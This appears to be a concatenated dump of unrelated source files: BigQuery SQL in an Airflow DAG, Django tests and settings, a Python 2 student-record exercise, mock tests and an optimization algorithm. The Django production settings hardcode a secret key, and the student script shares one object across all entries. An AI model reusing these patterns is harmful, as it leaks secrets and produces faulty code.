Revenue ELSE 0 END AS Firefox_Rev,\r\n CASE WHEN Clean_Browser="Chrome" THEN Post_Click_Conversions ELSE 0 END AS Chrome_Click_Convs,\r\n CASE WHEN Clean_Browser="Safari" THEN Post_Click_Conversions ELSE 0 END AS Safari_Click_Convs,\r\n CASE WHEN Clean_Browser="Firefox" THEN Post_Click_Conversions ELSE 0 END AS Firefox_Click_Convs,\r\n CASE WHEN Clean_Browser="Chrome" THEN Post_View_Conversions ELSE 0 END AS Chrome_View_Convs,\r\n CASE WHEN Clean_Browser="Safari" THEN Post_View_Conversions ELSE 0 END AS Safari_View_Convs,\r\n CASE WHEN Clean_Browser="Firefox" THEN Post_View_Conversions ELSE 0 END AS Firefox_View_Convs,\r\n CASE WHEN Clean_Browser="Chrome" THEN Post_Click_Conversions+Post_View_Conversions ELSE 0 END AS Chrome_Convs,\r\n CASE WHEN Clean_Browser="Safari" THEN Post_Click_Conversions+Post_View_Conversions ELSE 0 END AS Safari_Convs,\r\n CASE WHEN Clean_Browser="Firefox" THEN Post_Click_Conversions+Post_View_Conversions ELSE 0 END AS Firefox_Convs,\r\n \r\n CASE WHEN ITP_Affected_Browsers="Safari 12" THEN Impressions ELSE 0 END AS S12_Imps,\r\n CASE WHEN ITP_Affected_Browsers="Safari 11" THEN Impressions ELSE 0 END AS S11_Imps,\r\n CASE WHEN ITP_Affected_Browsers="Safari 10 & Below" THEN Impressions ELSE 0 END AS S_Imps,\r\n CASE WHEN ITP_Affected_Browsers="Non Safari" THEN Impressions ELSE 0 END AS NS_Imps,\r\n \r\n CASE WHEN ITP_Affected_Browsers="Safari 12" THEN Post_Click_Conversions ELSE 0 END AS S12_Click_Convs,\r\n CASE WHEN ITP_Affected_Browsers="Safari 11" THEN Post_Click_Conversions ELSE 0 END AS S11_Click_Convs,\r\n CASE WHEN ITP_Affected_Browsers="Safari 10 & Below" THEN Post_Click_Conversions ELSE 0 END AS S_Click_Convs,\r\n CASE WHEN ITP_Affected_Browsers="Non Safari" THEN Post_Click_Conversions ELSE 0 END AS NS_Click_Convs,\r\n \r\n CASE WHEN ITP_Affected_Browsers="Safari 12" THEN Post_View_Conversions ELSE 0 END AS S12_View_Convs,\r\n CASE WHEN ITP_Affected_Browsers="Safari 11" THEN Post_View_Conversions ELSE 0 END AS S11_View_Convs,\r\n CASE WHEN ITP_Affected_Browsers="Safari 10 & Below" THEN Post_View_Conversions ELSE 0 END AS S_View_Convs,\r\n CASE WHEN ITP_Affected_Browsers="Non Safari" THEN Post_View_Conversions ELSE 0 END AS NS_View_Convs,\r\n \r\n CASE WHEN ITP_Affected_Browsers="Safari 12" THEN Post_Click_Conversions+Post_View_Conversions ELSE 0 END AS S12_Convs,\r\n CASE WHEN ITP_Affected_Browsers="Safari 11" THEN Post_Click_Conversions+Post_View_Conversions ELSE 0 END AS S11_Convs,\r\n CASE WHEN ITP_Affected_Browsers="Safari 10 & Below" THEN Post_Click_Conversions+Post_View_Conversions ELSE 0 END AS S_Convs,\r\n CASE WHEN ITP_Affected_Browsers="Non Safari" THEN Post_Click_Conversions+Post_View_Conversions ELSE 0 END AS NS_Convs\r\n \r\n \r\n FROM browser_cleaned',
'legacy': False,
'parameters': [
{
'field': {
'name': 'dataset',
'kind': 'string',
'description': 'Place where tables will be written in BigQuery.'
}
}
]
}
}
},
{
'bigquery': {
'auth': 'service',
'to': {
'table': 'Combined_Browser_Delivery',
'dataset': {
'field': {
'name': 'dataset',
'kind': 'string',
'order': 1,
'default': '',
'description': 'BigQuery dataset to contain data.'
}
}
},
'from': {
'query': 'WITH cm AS ( SELECT Report_Day, CASE WHEN Platform_Type="Desktop" THEN "Desktop" WHEN Platform_Type="Tablet" THEN "Mobile_Tablet" WHEN Platform_Type="Mobile highend: smartphone" THEN "Mobile_Tablet" WHEN Platform_Type="Mobile midrange: feature phone" THEN "Mobile_Tablet" WHEN Platform_Type="Connected TV" THEN "CTV" END AS Device_Clean, SUM(Impressions) as CM_Impressions FROM `[PARAMETER].CM_Browser_Delivery` GROUP BY 1,2 ), dv3 AS ( SELECT Report_Day as RD, CASE WHEN Device_Type="Desktop" THEN "Desktop" WHEN Device_Type="Tablet" THEN "Mobile_Tablet" WHEN Device_Type="Smart Phone" THEN "Mobile_Tablet" WHEN Device_Type="Connected TV" THEN "CTV" END AS Device_Clean_DV360, SUM(Impressions) as DV360_Impressions FROM `[PARAMETER].DV360_Browser_Delivery` GROUP BY 1,2 ) SELECT Report_Day, Device_Clean, CM_Impressions, DV360_Impressions FROM cm a JOIN dv3 b ON a.Report_Day=b.RD AND a.Device_Clean=b.Device_Clean_DV360',
'legacy': False,
'parameters': [
{
'field': {
'name': 'dataset',
'kind': 'string',
'description': 'Place where tables will be written in BigQuery.'
}
},
{
'field': {
'name': 'dataset',
'kind': 'string',
'description': 'Place where tables will be written in BigQuery.'
}
}
]
}
}
}
]
DAG_FACTORY = DAG_Factory('itp', { 'tasks':TASKS }, INPUTS)
DAG_FACTORY.apply_credentails(USER_CONN_ID, GCP_CONN_ID)
DAG = DAG_FACTORY.execute()
if __name__ == "__main__":
DAG_FACTORY.print_commandline()
| [
"kenjora@google.com"
] | kenjora@google.com |
9f52c25f81a9401c049a07ab2f0d2bf4f56c2f38 | b87b4f2ad90390e6dcb53f258077ea6fea574f6c | /tests/test_models/test_user_model.py | 86f00ff5b9e2c85d4cf23f0173349b8b234bc5ee | [] | no_license | Wassally/backend | 1b73510ee451d433c1f747be5356c4e11b6e914a | 01071eb94ecfc3a3b260ae957a0aa638271c66b1 | refs/heads/master | 2022-11-26T13:24:01.684833 | 2019-06-30T06:02:29 | 2019-06-30T06:02:29 | 177,253,039 | 2 | 0 | null | 2022-11-22T03:30:11 | 2019-03-23T06:29:15 | Python | UTF-8 | Python | false | false | 805 | py | from django.test import TestCase
from api.factories import ClientFactory, CaptainFactory
from api.models import User, Captain
class ClientTest(TestCase):
def test_creation_client(self):
client = ClientFactory()
self.assertTrue(isinstance(client, User))
self.assertEqual(
client.__str__(),
"%d: %s" % (client.id, client.username)
)
self.assertTrue(client.is_client)
self.assertFalse(client.is_captain)
class CaptainTest(TestCase):
def test_creation_captain(self):
captain = CaptainFactory()
self.assertTrue(isinstance(captain, Captain))
self.assertEqual(captain.__str__(), captain.user.username)
self.assertTrue(captain.user.is_captain)
self.assertFalse(captain.user.is_client)
| [
"mahmoudzeyada440@gmail.com"
] | mahmoudzeyada440@gmail.com |
c6269e4c4cbe33348216a4e40f8dd8589429c416 | 0b49bc0a9df47f88bf687d18f723620bd62c3957 | /vrtech/src/vrtechgeeks/settings/production.py | 414754a29693d8b395689a9ab9ee78339bf3b1a1 | [] | no_license | vikky1993/DjangoPractice | 07f36f4b9132290a70f22997d99b37b1ca7c9685 | 434513927059cd452b7c9cd5947a3e876209f3cd | refs/heads/master | 2021-04-27T00:23:07.159792 | 2018-03-15T18:15:45 | 2018-03-15T18:15:45 | 123,803,368 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,129 | py | """
Django settings for vrtechgeeks project.
Generated by 'django-admin startproject' using Django 1.11.2.
For more information on this file, see
https://docs.djangoproject.com/en/1.11/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.11/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.11/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '%=n&c2^_d5=nk==-&l_*((ms68r=q67vddn(*t#hfet#j)e9+#'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = False
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'vrtechgeeks.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'vrtechgeeks.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.11/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/1.11/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/1.11/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.11/howto/static-files/
STATIC_URL = '/static/'
| [
"wickee0810@gmail.com"
] | wickee0810@gmail.com |
bb0efe67dfd3c78cf14534fae1ece53c7496dc21 | 9285ad640b5eab4efd268575690a0a6f5fa42973 | /8/8-1.py | 2107b09b762c208f5c430974c15d66760080fc5b | [] | no_license | dengdengkai/Python_practise | d8d2935ed7981bdaa06cc86881912e3a76ff3aba | 2750ebf0a53b1fee24a3399b77505f0b0146d733 | refs/heads/master | 2020-03-26T07:23:32.766902 | 2018-08-17T08:35:40 | 2018-08-17T08:35:40 | 144,652,196 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 883 | py | #!/usr/bin/env python
#coding: UTF-8
"""
题目:编写input()和output()函数输入,输出5个学生的数据记录。
程序分析:无。
"""
class Student:
name = ""
age = 0
score = [None] *4
def input(self):
self.name = raw_input("Input name,please:")
self.age = int(raw_input("Input age,please:"))
for i in range(len(self.score)):
self.score[i]=int(raw_input("Input %d score,please: " % (i+1)))
def output(self):
print 'Output name: %s' % self.name
print 'Output age: %d' % self.age
for i in range(len(self.score)):
print 'Output %d score: %d' % ((i+1),self.score[i])
if __name__ == '__main__':
N =5
studentArray = [Student()] *N
for i in range(len(studentArray)):
studentArray[i].input()
for i in range(len(studentArray)):
studentArray[i].output()
| [
"1115132936@qq.com"
] | 1115132936@qq.com |
c6c56c4c86be2360dc24af49f82fbc2fe890e140 | 21de9bc6f4d4584d2fd385359d76a005ff66aa48 | /tests/test_loading.py | f569886d65a330e7608419dc66aa67f62e9eaa01 | [] | no_license | minorsecond/GIS-Helper | 33cbbe193266acddab99ff55c1bb540a26c83713 | 29dbedbde3caa4436f4b5933b9f10cb87ce47ef2 | refs/heads/master | 2021-05-24T04:01:32.967888 | 2020-09-12T11:07:07 | 2020-09-12T11:07:07 | 63,873,429 | 0 | 0 | null | 2020-10-31T10:37:11 | 2016-07-21T13:51:09 | Python | UTF-8 | Python | false | false | 439 | py | # Test loading of shapefiles and rasters
from vector import meta
import shapefile
def test_load_shapefile():
input_payload = ["", "tests\\test_data\\texas.shp", ""]
shapefile_functions = meta.PolygonFunctions()
shp = shapefile_functions.load_polygons(input_payload)
assert type(shp) == shapefile.Shapes
def test_load_raster():
input_payload = "tests\\test_data\\i30dem.tif"
# TODO: Write the raster load code
| [
"minorsecond@gmail.com"
] | minorsecond@gmail.com |
b036d6fd8e95f539ae982a23cf985148ad491aca | bcabce262e54a6ac38948a4717254cdc3ce65874 | /mealpy/physics_based/WDO.py | 3e376916b7ec257ba7469ad4a3260e10a7cdabce | [
"MIT"
] | permissive | ibrahim85/MEta-heuristics-ALgorithms-in-PYthon | 4ab6e6ef54127b6f4721178a1f855d1be91f9b42 | 47fb428e8378fc52cd5fe6eff20cec1c68ba5039 | refs/heads/master | 2023-06-03T05:23:31.993100 | 2021-06-28T14:48:38 | 2021-06-28T14:48:38 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,794 | py | #!/usr/bin/env python
# ------------------------------------------------------------------------------------------------------%
# Created by "Thieu Nguyen" at 21:18, 17/03/2020 %
# %
# Email: nguyenthieu2102@gmail.com %
# Homepage: https://www.researchgate.net/profile/Thieu_Nguyen6 %
# Github: https://github.com/thieu1995 %
#-------------------------------------------------------------------------------------------------------%
from numpy.random import uniform, randint
from numpy import ones, clip
from mealpy.root import Root
class BaseWDO(Root):
"""
The original version of : Wind Driven Optimization (WDO)
The Wind Driven Optimization Technique and its Application in Electromagnetics
Link:
https://ieeexplore.ieee.org/abstract/document/6407788
"""
def __init__(self, obj_func=None, lb=None, ub=None, verbose=True, epoch=750, pop_size=100,
RT=3, g=0.2, alp=0.4, c=0.4, max_v=0.3, **kwargs):
super().__init__(obj_func, lb, ub, verbose, kwargs)
self.epoch = epoch
self.pop_size = pop_size
self.RT = RT # RT coefficient
self.g = g # gravitational constant
self.alp = alp # constants in the update equation
self.c = c # coriolis effect
self.max_v = max_v # maximum allowed speed
def train(self):
"""
# pop is the set of "air parcel" - "position"
# air parcel: is the set of gas atoms . Each atom represents a dimension in position and has its own velocity
# pressure represented by fitness value
"""
pop = [self.create_solution() for _ in range(self.pop_size)]
g_best = self.get_global_best_solution(pop, self.ID_FIT, self.ID_MIN_PROB)
list_velocity = self.max_v * uniform(self.lb, self.ub, (self.pop_size, self.problem_size))
for epoch in range(self.epoch):
# Update velocity based on random dimensions and position of global best
for i in range(self.pop_size):
rand_dim = randint(0, self.problem_size)
temp = list_velocity[i][rand_dim] * ones(self.problem_size)
vel = (1 - self.alp)*list_velocity[i] - self.g * pop[i][self.ID_POS] + \
(1 - 1.0/(i+1)) * self.RT * (g_best[self.ID_POS] - pop[i][self.ID_POS]) + self.c * temp / (i+1)
vel = clip(vel, -self.max_v, self.max_v)
# Update air parcel positions, check the bound and calculate pressure (fitness)
pos = pop[i][self.ID_POS] + vel
pos = self.amend_position_faster(pos)
fit = self.get_fitness_position(pos)
pop[i] = [pos, fit]
list_velocity[i] = vel
## batch size idea
if self.batch_idea:
if (i + 1) % self.batch_size == 0:
g_best = self.update_global_best_solution(pop, self.ID_MIN_PROB, g_best)
else:
if (i + 1) % self.pop_size == 0:
g_best = self.update_global_best_solution(pop, self.ID_MIN_PROB, g_best)
self.loss_train.append(g_best[self.ID_FIT])
if self.verbose:
print(">Epoch: {}, Best fit: {}".format(epoch + 1, g_best[self.ID_FIT]))
self.solution = g_best
return g_best[self.ID_POS], g_best[self.ID_FIT], self.loss_train
| [
"nguyenthieu2102@gmail.com"
] | nguyenthieu2102@gmail.com |
7896bf7d5c6ab4689d3061e5426418964b6eaa21 | 8b29b6176314d40ac11d0adb33e5b89c16c5679d | /tests/Zadanie1_tests/test_FileEdit.py | 5a51bb1dc8ff4df9f0e3b192556cfc4fa759e552 | [
"MIT"
] | permissive | TestowanieAutomatyczneUG/laboratorium-11-LudwikaMalinowska | c276e1d5c6d1fcfa85ee3556e155c1c369bb2fbb | 1e1bd74c0d098336773d5a7cda8def04bb5f0f0f | refs/heads/main | 2023-02-01T17:30:08.642811 | 2020-12-18T22:58:03 | 2020-12-18T22:58:03 | 322,655,532 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,127 | py | from unittest import mock
from unittest.mock import Mock, call, mock_open, patch
import unittest
from Zadanie1.FileEdit import FileEdit
class TestFileEdit(unittest.TestCase):
def setUp(self):
self.temp = FileEdit()
def test_open_file(self):
file_path = "plik.txt"
mock = mock_open(read_data="abc")
with patch('builtins.open', mock):
self.assertEqual(self.temp.open_file(file_path), "abc")
def test_edit_file(self):
file_path = "plik.txt"
# text = "def"
mock = mock_open(read_data="abc")
with patch('builtins.open', mock):
self.temp.edit_file(file_path, "def")
mock.assert_called_once_with(file_path, "w")
@mock.patch('Zadanie1.FileEdit.os.path')
@mock.patch('Zadanie1.FileEdit.os')
def test_delete_file(self, mock_os, mock_path):
file_path = "plik.txt"
mock_path.exists.return_value = True
self.temp.delete_file(file_path)
mock_os.remove.assert_called_with(file_path)
def tearDown(self):
self.temp = None
if __name__ == '__main__':
unittest.main() | [
"malinowska.L@wp.pl"
] | malinowska.L@wp.pl |
a13e485cf2a845c87a8f08906bd0f2887847cf2d | d8a0b8d3926d200a79309844946162becd15018b | /manipulando.textos-transformaçao.py | 05e1851498033973d272da74faffba87c032a43a | [] | no_license | GustavoBonet/python.teste | 37f59d07591a7085ac3b3b0ccbe8cc3e8664170f | 1bbec386be6eba2b679eaed742f1d32eb89001d4 | refs/heads/master | 2023-03-12T08:56:33.458494 | 2021-03-05T11:52:35 | 2021-03-05T11:52:35 | 327,271,693 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 561 | py | frase = str(input('Digite a frase:')).rstrip()
# lstrip para tirar espaços da esquerda e rstrip para tirar espaços da direita
print(frase.replace('diamante', 'ouro'))
# vai trocar palavras, se estiver escrito diamante a palavra vira ouro
print(frase.upper())
# vai colocar tudo em maiusculo
print(frase.lower())
# vai colocar tudo em minusculo
print(frase.capitalize())
# vai deixar apenas a primeira letra em maiusculo
print(frase.title())
# vai colocar a primeira letra de cada palavra em maiusculo
print(frase.split())
# dividi todos espaços vazios
| [
"55928208+GustavoBonet@users.noreply.github.com"
] | 55928208+GustavoBonet@users.noreply.github.com |
d3d04dbfb5c8f459adb169cdcf503bdc3d9f717c | 57bfbcb5fd7c0b13909150032ac7d29462dafc1c | /0610/ex.01.py | 4bd1111de480b6f19766b359806ca49f722439cc | [] | no_license | hoo159/Programing | ac8a5f5e58cc51d4d8558055cb8454da047346ea | 97268c097d94b3b6721c6e85a640093834a25ceb | refs/heads/master | 2022-11-14T19:15:46.032238 | 2020-07-08T14:29:09 | 2020-07-08T14:29:09 | 263,524,782 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 64 | py | i=0
s=0
for i in range(1,10,2):
s += i
print(i, s)
| [
"noreply@github.com"
] | hoo159.noreply@github.com |
04c56cd4ec6d55d958326bdeccd11c0de6f926e3 | 1999b5219dd4266ebae1dc54d1c9df72aebaf41e | /TI/Code/flaskdemo/app/config.py | a6b05b8c7faaaaaf678ea334c5a31e30ab6a3d98 | [] | no_license | Garfield247/dmp_test | a6c6a860517171403f4b49292c7f8e424ad87241 | b0f104200990c09054e958b556fb6ca28c14c9ef | refs/heads/master | 2021-05-20T00:34:55.747018 | 2020-04-13T06:13:40 | 2020-04-13T06:13:40 | 252,109,165 | 0 | 0 | null | 2021-02-02T22:35:57 | 2020-04-01T07:56:05 | JavaScript | UTF-8 | Python | false | false | 1,050 | py | import os
base_dir = os.path.abspath(os.path.dirname(__file__))
class Config():
# 系统秘钥 设置从服务器环境变量获取或者使用shtddsj123.
SECRET_KEY = os.environ.get("SECRET_KEY") or "shtddsj123."
# 数据库相关设置
SQLALCHEMY_TRACK_MODIFICATIONS = True
SQLALCHEMY_COMMIT_ON_REARDOWN = True
UPLOADED_PATH = os.path.join(base_dir,"uploads")
# CELERY_BROKER_URL='redis://0.0.0.0:6379/0'
# CELERY_RESULT_BACKEND='redis://0.0.0.0:6379/0'
@staticmethod
def init_app(app):
pass
class DevelopmentConfig(Config):
SQLALCHEMY_DATABASE_URI = "sqlite:///" + os.path.join(base_dir,"dmp-dev.sqlite")
class TestingConfig(Config):
SQLALCHEMY_DATABASE_URI = "sqlite:///" + os.path.join(base_dir,"dmp-test.sqlite")
class ProductionConfig(Config):
SQLALCHEMY_DATABASE_URI = "sqlite:///" + os.path.join(base_dir,"dmp-pro.sqlite")
config = {
'development':DevelopmentConfig,
'testing':TestingConfig,
'production':ProductionConfig,
'default':DevelopmentConfig,
}
| [
"garfield_lv@163.com"
] | garfield_lv@163.com |
833d370e27227a2379930e7622fb9f9e1f88c634 | f6c78384b04e1f3bf286fae9b0e2a71e8c448727 | /选择排序.py | 1e59a51c49e9980c0413e2e13c32e7ee124631ac | [] | no_license | Waycc/algorithm | 72c9eb05e29a035ae510ce2f3a10c35748436796 | 55d26da661313b23e93cd716c4859c294e0fccb6 | refs/heads/master | 2021-08-10T19:12:02.996924 | 2020-03-22T14:29:01 | 2020-03-22T14:29:01 | 131,179,762 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 240 | py | import random
lst = [random.randint(1,1000) for i in range(100)]
for i in range(len(lst)):
k = i
for j in range(i+1,len(lst)):
if lst[k] > lst[j]:
k = j
if k != i:
lst[i], lst[k] = lst[k], lst[i]
| [
"33125913+Waycc@users.noreply.github.com"
] | 33125913+Waycc@users.noreply.github.com |
03642d498311f9cd8cccf5fe6deafb94f85ca1b1 | b74486d5bd8a96455572ff879df148f08d718031 | /slpa/spla.py | 0a8305aa32b2dec4dc376cbb5f29f85d170a215b | [] | no_license | hulkfolk/CS5344CommunityDetection | 87c182274628406111d5f57db9addd89204c892c | bbc5ea211e16296331149516e2ebe349d9271bc3 | refs/heads/master | 2020-08-06T13:32:52.730792 | 2019-10-26T04:03:40 | 2019-10-26T04:03:40 | 212,992,373 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,924 | py | import re
import sys
from pyspark import SparkConf, SparkContext
import os
import glob
import math
import argparse
import random
import json
conf = SparkConf()
sc = SparkContext(conf=conf)
def read_graph_from_file(path):
edge = sc.textFile(graph_file).flatMap(lambda x: re.split('\n',x))
node = sc.textFile(graph_file).flatMap(lambda x: re.split(r"[ \t\n]",x))
edgel = edge.map(lambda x: (re.split('\t',x)[0],re.split('\t',x)[1]))
edger = edge.map(lambda x: (re.split('\t',x)[1],re.split('\t',x)[0]))
edge = edgel.union(edger).distinct()
edge = edge.groupByKey().mapValues(list) # List speaker for each listener, (listener, (speaker1, speaker2, ...))
node = node.distinct().map(lambda x: (x, x)) # Give each node initial community lable, (node, tag)
return edge, node
def slpa(edge, node, percentage, iteration):
for i in range(1,iteration):
if i == 1:
rnode = node
else:
rnode = node.map(lambda x: (x[0],x[1][random.randint(0,len(x[1])-1)]))
itag = edge.flatMapValues(f)
itag = itag.map(lambda x: (x[1],x[0]))
itag = itag.join(rnode) # (speaker, (listener, speaker tag))
itag = itag.map(lambda x: (x[1],1)) # ((listener, speaker tag),1)
itag = itag.groupByKey().mapValues(len) # ((listener, speaker tag),count)
itag = itag.map(lambda x: (x[0][0],(x[0][1],x[1]))) # (listener, (speaker tag,count))
itag = itag.reduceByKey(lambda n1,n2: (n1[0], n1[1]) if n1[1]>=n2[1] else (n2[0],n2[1]))
itag = itag.map(lambda x: (x[0],x[1][0]))
node = node.join(itag)
if i > 1:
node = node.map(lambda x: (x[0],(x[1][0]+(x[1][1],))))# (listener, (tag1, tag2))
lsedget = node.flatMapValues(f)
writetxt(node.collect(),'ls.txt')
lsedge = lsedget.map(lambda x: (x,1))
scount = lsedget.map(lambda x: (x[0],1))
scount = scount.groupByKey().mapValues(len)
lsedge = lsedge.reduceByKey(lambda n1,n2: n1+n2)
lsedge = lsedge.map(lambda x: (x[0][0],(x[0][1],x[1]))) # (listener, (tag, tag count))
#writetxt(lsedge.collect(),'lswithoutfilter.txt')
writetxt(scount.collect(),'scount.txt')
lsedge = lsedge.join(scount) # (listener, ((tag, tag count),total tag))
writetxt(lsedge.collect(),'lsnumber.txt')
lsedge = lsedge.map(lambda x: (x[0],(x[1][0][0],float(x[1][0][1])/float(x[1][1])))) # (listener, (tag, tag count/total tag))
lsedge = lsedge.filter(lambda x: x[1][1]>=percentage)
lsedge = lsedge.map(lambda x: (x[0],x[1][0]))
writetxt(lsedge.collect(),'lswithoutfilter.txt')
node = lsedge.groupByKey().mapValues(list)
return node
def f(x): return x
def writetxt(lst,name):
with open(name,'w') as f:
#for item in lst:
f.write(json.dumps(lst))
#f.write('\n')
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--percentage', help='percentage of community popularity', default=0.1)
parser.add_argument('--iteration', help='number of iteration', default=6)
parser.add_argument('--filename', help='file in data folder', default='com-dblp.ungraph.txt')
#parser.add_argument('--filename', help='file in data folder', default='graph.txt')
args = parser.parse_args()
graph_file = os.path.join(os.path.dirname(__file__), '..', 'data', args.filename)
edge, node = read_graph_from_file(graph_file)
print('Graph loaded\n')
percentage = args.percentage
iteration = args.iteration
node = slpa(edge, node, percentage, iteration)
community = node.flatMapValues(f)
community = community.map(lambda x: (x[1],x[0]))
community = community.groupByKey().mapValues(list)
community = community.filter(lambda x: len(x[1])>1)
community = community.map(lambda x: x[1])
#community = list(set(community.collect()))
writetxt(community.collect(),'final.txt')
print(community.collect())
| [
"noreply@github.com"
] | hulkfolk.noreply@github.com |
dd8418fe80e3b14a0d109e397f6d2685451be0d0 | 47364afd2bbae831850a2edddc23d46711fbfa2b | /analysis/perftest105.py | 833786baf4938f5ba97b66d2848360ddeae6d026 | [] | no_license | kostrzewa/chroma-auxiliary-scripts | 149d67175f537847710b65e6af69a91922bcb3a0 | 2228b396ed13961a99ffe8b8ce6d5fa35784e3ed | refs/heads/master | 2021-07-11T09:27:57.554247 | 2017-10-13T14:29:30 | 2017-10-13T14:29:30 | 106,831,418 | 0 | 0 | null | 2017-10-13T13:59:36 | 2017-10-13T13:59:36 | null | UTF-8 | Python | false | false | 2,808 | py | #!/usr/bin/python3
# -*- coding: utf-8 -*-
# Copyright © YEAR Martin Ueding <dev@martin-ueding.de>
import argparse
import collections
import glob
import itertools
import os
import re
import matplotlib.pyplot as pl
import numpy as np
import scipy.optimize as op
import util
def main():
options = _parse_args()
pattern = re.compile(r'0105-perf_nodes=(?P<A_nodes>\d+)_ntasks=(?P<B_ntasks>\d+)_cpus=(?P<C_cpus>\d+)_affinity=(?P<E_affinity>\w+?)/')
pattern_total_time = re.compile('HMC: total time = ([\d.]+) secs')
rows = []
for run in options.run:
print(run)
m = pattern.match(run)
if not m:
continue
cols1 = m.groupdict()
nodes = int(cols1['A_nodes'])
tasks = int(cols1['B_ntasks'])
cpus = int(cols1['C_cpus'])
cols1['D_SMT'] = tasks * cpus // 24
try:
cols2 = {
'QPhiX CG Perf': np.loadtxt(os.path.join(run, 'extract-solver-QPhiX_Clover_CG-gflops_per_node.tsv'))[1],
'QPhiX M-Shift Perf': np.loadtxt(os.path.join(run, 'extract-solver-QPhiX_Clover_M-Shift_CG-gflops_per_node.tsv'))[1],
}
except FileNotFoundError as e:
print(e)
continue
logfile = glob.glob(os.path.join(run, 'slurm-*.out'))[0]
with open(logfile) as f:
lines = f.readlines()
m = pattern_total_time.match(lines[-1])
if m:
cols2['minutes'] = float(m.group(1)) / 60
else:
cols2['minutes'] = 0
print(cols2.values())
rows.append((cols1, cols2))
print()
print()
for key in itertools.chain(sorted(cols1.keys()), sorted(cols2.keys())):
print('{:15s}'.format(str(key)[:13]), end='')
print()
for cols1, cols2 in rows:
for key, value in itertools.chain(sorted(cols1.items()), sorted(cols2.items())):
print('{:15s}'.format(str(value)[:13]), end='')
print()
for x in cols1.keys():
for y in cols2.keys():
fig, ax = util.make_figure()
data = collections.defaultdict(list)
for c1, c2 in rows:
data[c1[x]].append(c2[y])
d = [value for key, value in sorted(data.items())]
l = [key for key, value in sorted(data.items())]
ax.boxplot(d, labels=l)
ax.set_xlabel(x)
ax.set_ylabel(y)
util.save_figure(fig, 'boxplot-{}-{}'.format(x, y))
def _parse_args():
'''
Parses the command line arguments.
:return: Namespace with arguments.
:rtype: Namespace
'''
parser = argparse.ArgumentParser(description='')
parser.add_argument('run', nargs='+')
options = parser.parse_args()
return options
if __name__ == '__main__':
main()
| [
"dev@martin-ueding.de"
] | dev@martin-ueding.de |
0904c458b8c40b6d95fc8f7b0f553fdafb297a88 | bb13a1395372a965975a169ae336542476d1d6d8 | /posts/views.py | e113e5b407a3a615c995b2384eadc2691c55a730 | [] | no_license | lebedovskiy/django-vuejs-vuex-template | 5730bbe9977dcefc7da7f453ca78396f01f98286 | 5e9dc4e81e624f157c6281d759edaeaca98e17db | refs/heads/master | 2022-12-11T08:34:37.270987 | 2018-07-14T08:48:16 | 2018-07-14T08:48:16 | 140,583,662 | 0 | 0 | null | 2022-12-08T07:04:32 | 2018-07-11T14:04:19 | JavaScript | UTF-8 | Python | false | false | 390 | py | # Create your views here.
from rest_framework import viewsets
from posts.models import Post
from posts.serializers import PostSerializer
class PostViewSet(viewsets.ModelViewSet):
"""
API endpoint that allows Posts to be viewed or edited.
"""
queryset = Post.objects.all().order_by('published_date')
post = Post.objects.get(id=1)
serializer_class = PostSerializer
| [
"lebedovskiy@mail.ru"
] | lebedovskiy@mail.ru |
86af7ad60e7cbbd6e4b2288e7097cf98510b65eb | 2d7939546af7a2167457875a23da512ce7a30d26 | /abchat/model/model.py | 64a30ff6de5b9e7d0aa80c5e403fad223c84afff | [] | no_license | cg3932/online_chat_application | 46b78073a9dc703b3bcce9f2e789d71c93361a9e | 31388143c51aafe405c47fee78250a5ebacbf888 | refs/heads/master | 2021-05-27T23:20:43.429947 | 2012-09-25T23:57:49 | 2012-09-25T23:57:49 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 668 | py | # This file is an importer for the whole data model
# it must be imported in this way so as to not
# break relational dependencies
#
# Iain Macdonald
# ECSE 428 Team ABC
# Winter 2011
from abchat.model.user import User
from abchat.model.buddies import Buddies
